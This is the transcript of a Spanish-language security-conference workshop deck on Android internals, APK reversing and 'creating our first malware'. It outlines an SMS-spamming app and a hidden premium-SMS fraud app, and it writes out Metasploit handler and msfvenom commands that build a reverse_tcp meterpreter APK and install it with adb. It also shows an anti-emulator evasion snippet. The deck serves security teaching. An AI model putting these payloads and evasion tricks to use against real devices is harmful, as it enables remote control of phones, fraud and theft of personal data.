Taller Android Navaja Negra 5 ED
-
Upload
mirojo -
Category
Technology
-
view
647 -
download
1
Transcript of Taller Android Navaja Negra 5 ED
![Page 1: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/1.jpg)
Taller de Android desde 0 hasta
generar nuestro primer malware
Seguridad e inseguridad en Android
![Page 2: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/2.jpg)
Índice
Sobre mi
Android desde 0
Reversing APKs
Creando nuestro malware: HolaMundo
Creando nuestro malware: SMS Receiver
Creando nuestro malware: Metasploit
Escondiendo el bicho
Pentesting APKs
Porque
Dónde
El futuro
Bibliografía
![Page 3: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/3.jpg)
Sobre mi
Graduada en Sistemas Informáticos.
Auditora de seguridad en el código.
Indra.
Miembro-Fundadora de Gr2Dest.
https://es.linkedin.com/pub/maría-rojo/25/19/8b8
http://ensaladadebits.blogspot.com.es/
http://www.gr2dest.org/
https://github.com/mirojo
![Page 4: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/4.jpg)
Android desde 0
Arquitectura Android
Componentes Android
Broadcast
Activity
Service
Content Provider
Manifest
IPC
Sandbox Android
![Page 5: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/5.jpg)
Arquitectura Android
![Page 6: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/6.jpg)
Componentes Android
![Page 7: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/7.jpg)
Componentes Android
Broadcast Receiver:
Elemento para poder emitir
y responder a mensajes de
otras aplicaciones o del
sistema.
![Page 8: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/8.jpg)
Componentes Android
Activity:
Son las pantallas visuales de las aplicaciones.
![Page 9: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/9.jpg)
Componentes Android
Service
Ejecuta tareas en
segundo plano sin
bloquear la interfaz de
usuario.
![Page 10: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/10.jpg)
Componentes Android
Content Provider
Provee de la capacidad para poder compartir información
entre diferentes aplicaciones.
![Page 11: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/11.jpg)
IPC
IPC es Inter Process Comunication. Son aquellos mecanismos que dispone Android para que los componentes se comuniquen entre sí: Un intent es la descripción abstracta de una operación que se va a
llevar a cabo. O dicho de otro modo, un Intent es una clase que permite especificar una Activity a ejecutar, llamando a uno de los métodos de la clase Activity con ese Intent de parámetro. Esta considerado como el mecanismo universal para pasar datos entre procesos.
Bundles: Semejante a la serialización pero más rápido.
Binders: Entidad que permite a las actividades y servicios obtener referencias a otros servicios. Permite no solo el envío de mensajes a servicios sino directamente invocar métodos de ellos. El más usado en RPC-style. Este elemento es una de las piedras angulares en el patrón de seguridad Android. Se recomienda su uso para entornos seguros.
![Page 12: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/12.jpg)
Android Sandbox
![Page 13: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/13.jpg)
Android Manifest
Archivo XML que se genera al crear el proyecto, es
imprescindible dado que en están recogidas tocas las
especificaciones, componentes y permisos de todos los
elemento que forman la aplicación.
Entender este archivo no es complejo y sí vital para la
detección de malware.
![Page 14: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/14.jpg)
Ejemplo Lighter
![Page 15: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/15.jpg)
Ejemplo HackWifi
![Page 16: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/16.jpg)
Ejemplo Dendroid
![Page 17: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/17.jpg)
Una APP por dentro
![Page 18: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/18.jpg)
Una APP por dentro
![Page 19: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/19.jpg)
Índice
Sobre mi
Android desde 0
Reversing APKs
Creando nuestro malware: HolaMundo
Creando nuestro malware: SMS Receiver
Creando nuestro malware: Metasploit
Escondiendo el bicho
Pentesting APKs
Porque
Dónde
El futuro
Bibliografía
![Page 20: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/20.jpg)
Reversing APK
APKTool
Todo en uno.
Muy actualizada.
Deserializa AndroidManifest
Decodifica los recursos
De-construye y construye
http://ibotpeaches.github.io/Apktool/
![Page 21: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/21.jpg)
Reversing APK Dex2Jar
Menos funciones.
Genera un jar desde una APK
Puede generar código Jasmin
Smali es el formato dex usado por la DVM
Jasmin lenguaje en el que se basa Smali, su
sintaxis.
https://github.com/pxb1988/dex2jar
![Page 22: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/22.jpg)
Reversing APK
JAR SMALI
![Page 23: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/23.jpg)
Reversing APK
![Page 24: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/24.jpg)
Reversing APK
apktool d app.apk
Modificar código smali
apktool.jar b app app2.apk
Firmar la APK
jarsigner -verbose -keystore C:\Users\mirojo\navaja_negra.jks
-storepass 123456 -keypass 123456
D:\Android\APKTool201\lighter\dist\app.apk mirojo
![Page 25: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/25.jpg)
Reversing APK
d2j-dex2jar app.apk
Abrir con JD-GUI
File -> Save all Sources (Ctrl+Alt+S)
Abrir con el editor Android Studio, Eclipse…
![Page 26: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/26.jpg)
Reversing APK
Problemas:
Hay que montar el proyecto. Copiar las carpetas generadas
con APKTool: assets, res y el AndroidManifest.
No se realiza un reversing completo por lo que no se puede
volver a compilar.
![Page 27: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/27.jpg)
Índice
Sobre mi
Android desde 0
Reversing APKs
Creando nuestro malware: HolaMundo
Creando nuestro malware: SMS Receiver
Creando nuestro malware: Metasploit
Escondiendo el bicho
Pentesting APKs
Porque
Dónde
El futuro
Bibliografía
![Page 28: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/28.jpg)
Malware
Creando nuestro malware: HolaMundo
Creando nuestro malware: SMS Receiver
Creando nuestro malware: Metasploit
![Page 29: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/29.jpg)
Creando nuestro malware:
HolaMundo
Dos Activity
Activity 1: Solo muestra un formulario.
Activity 2:
Recorre toda la agenda de contactos.
Manda un SMS a cada uno de ellos.
El mensaje del SMS puede ser maligno.
![Page 30: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/30.jpg)
Creando nuestro malware: SMS
Receiver
Abrimos el programa.
Lanza un SMS de forma invisible al usuario a un destino
con un mensaje predefinido. Simulador de SMS de alta en
servicios de pago.
El servicio de pago devuelve un SMS
Se bloquea el SMS para que el usuario no pueda ver el
aviso de mensaje entrante y no sea consciente del timo.
![Page 31: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/31.jpg)
Creando nuestro malware: Metasploit
Activamos que Metasploit quede a la escucha.
help search
search platform:android
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
show options
set LHOST 192.168..
set LPORT
exploit
![Page 32: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/32.jpg)
Creando nuestro malware: Metasploit
Creamos el malware de Metasploit
msfvenom -p android/meterpreter/reverse_tcp LHOST=1
92.68.. LPORT=6764 R > navaja.apk
Instalamos el malware en un dispositivo
adb install navaja.apk
https://www.offensive-security.com/metasploit-
unleashed/meterpreter-basics/
![Page 33: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/33.jpg)
Índice
Sobre mi
Android desde 0
Reversing APKs
Creando nuestro malware: HolaMundo
Creando nuestro malware: SMS Receiver
Creando nuestro malware: Metasploit
Escondiendo el bicho
Pentesting APKs
Porque
Dónde
El futuro
Bibliografía
![Page 34: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/34.jpg)
Escondiendo el bicho
Ofuscación: ProGuard
![Page 35: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/35.jpg)
Escondiendo el bicho
Anti Emuladores
public boolean checkEmulation() {
TelephonyManager mng = (TelephonyManager) getApplicationContext().getSystemService("phone");
if (mng.getSimOperatorName().equals("Android") || mng.getNetworkOperatorName().equals("Android")) {
return true;
}
return false;
}
![Page 36: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/36.jpg)
Escondiendo el bicho
Anti Debuggers
![Page 37: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/37.jpg)
Escondiendo el bicho
Anti Antivirus
![Page 38: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/38.jpg)
Índice
Sobre mi
Android desde 0
Reversing APKs
Creando nuestro malware: HolaMundo
Creando nuestro malware: SMS Receiver
Creando nuestro malware: Metasploit
Escondiendo el bicho
Pentesting APKs
Porque
Dónde
El futuro
Bibliografía
![Page 39: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/39.jpg)
Pentesting APK
Preparando el entorno
Auditando con BurpSuite
Auditando con WireShark
![Page 40: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/40.jpg)
Pentesting APK
Maquinas virtuales.
Recomendado tener varias API, actualmente 18,19,22 y 23.
![Page 41: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/41.jpg)
Pentesting APK
![Page 42: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/42.jpg)
Pentesting APK
BurpSuite configuración.
![Page 43: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/43.jpg)
Pentesting APK
Configurar proxy en el emulador.
Pasos en la API22 con Genymotion.
![Page 44: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/44.jpg)
Pentesting APK
![Page 45: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/45.jpg)
Pentesting APK
![Page 46: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/46.jpg)
Índice
Sobre mi
Android desde 0
Reversing APKs
Creando nuestro malware: HolaMundo
Creando nuestro malware: SMS Receiver
Creando nuestro malware: Metasploit
Escondiendo el bicho
Pentesting APKs
Porque
Dónde
El futuro
Bibliografía
![Page 47: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/47.jpg)
Por qué
Por dinero.
SMS de pago
Fraude de publicidad/BlackSeo
Venta de malware “a la carta”
Venta de datos personales
El límite es tu imaginación.
![Page 48: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/48.jpg)
Dónde
Google Play
Markets APPs no oficiales
Foros
Redes sociales/Blogs….
Infectado desde elementos de confianza (Ejemplo
HolaMundo).
P2P
Otra vez… El límite es tu imaginación.
![Page 49: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/49.jpg)
El futuro
![Page 50: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/50.jpg)
El futuro
![Page 51: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/51.jpg)
El futuro
![Page 52: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/52.jpg)
Bibliografía
http://www.welivesecurity.com/la-es/2015/09/08/malware-movil-evasion-en-android/
http://contagiominidump.blogspot.com.es/
https://koodous.com
![Page 53: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/53.jpg)
¿¿Dudas??
![Page 54: Taller Android Navaja Negra 5 ED](https://reader033.fdocumento.com/reader033/viewer/2022042517/58f1ebbe1a28ab14728b45d1/html5/thumbnails/54.jpg)
Muchas gracias